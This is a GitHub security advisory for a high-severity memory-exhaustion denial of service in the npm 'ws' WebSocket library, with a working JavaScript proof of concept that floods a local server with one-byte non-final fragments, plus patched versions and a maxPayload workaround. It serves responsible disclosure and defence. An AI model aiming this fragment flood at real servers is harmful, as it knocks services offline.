GHSA-96hv-2xvq-fx4pHighCVSS 7.5

ws: Memory exhaustion DoS from tiny fragments and data chunks

Published
June 15, 2026
Last Modified
June 15, 2026

🔗 CVE IDs covered (1)

📋 Description

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1);
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`client close - code: ${code} reason: ${reason.toString()}`);
  });
});

wss.on('connection', function (ws) {
  ws.on('error', console.error);
  ws.on('close', function (code, reason) {
    console.log(`server close - code: ${code} reason: ${reason.toString()}`);
  });
});

Patches

The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to [email protected] (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), [email protected] (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and [email protected] (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

🎯 Affected products4

  • npm/ws:>= 1.1.0, < 5.2.5
  • npm/ws:>= 6.0.0, < 6.2.4
  • npm/ws:>= 7.0.0, < 7.5.11
  • npm/ws:>= 8.0.0, < 8.21.0

🔗 References (6)